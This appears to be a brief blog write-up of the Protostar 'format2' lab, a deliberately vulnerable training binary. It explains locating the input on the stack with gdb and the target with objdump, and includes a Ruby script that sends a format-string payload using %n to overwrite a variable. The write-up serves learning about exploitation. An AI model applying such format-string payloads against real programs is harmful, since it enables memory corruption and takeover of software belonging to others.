Format 2 was quite easy, even easier than format 1 for me. All you need is to write appropriate byte to the target address.
Firstly I found my own string on stack using gdb. First 4 bytes were fourth parameter inside format string. Also I found target address using objdump -t . I have used %60x format part that with address will result in 64 bytes to write 0x40( or 64 decimal) to target. I wrote simple script that do the work:
Screenshot:
Firstly I found my own string on stack using gdb. First 4 bytes were fourth parameter inside format string. Also I found target address using objdump -t . I have used %60x format part that with address will result in 64 bytes to write 0x40( or 64 decimal) to target. I wrote simple script that do the work:
#!/usr/bin/ruby1.9.1
require 'open3'
fmt_string = "\xe4\x96\x04\x08%60x%4$n"
stdin,stdout,stderr = Open3.popen3('/opt/protostar/bin/format2')
puts fmt_string
stdin.puts fmt_string
puts stdout.gets
puts stdout.gets
Screenshot:
No comments:
Post a Comment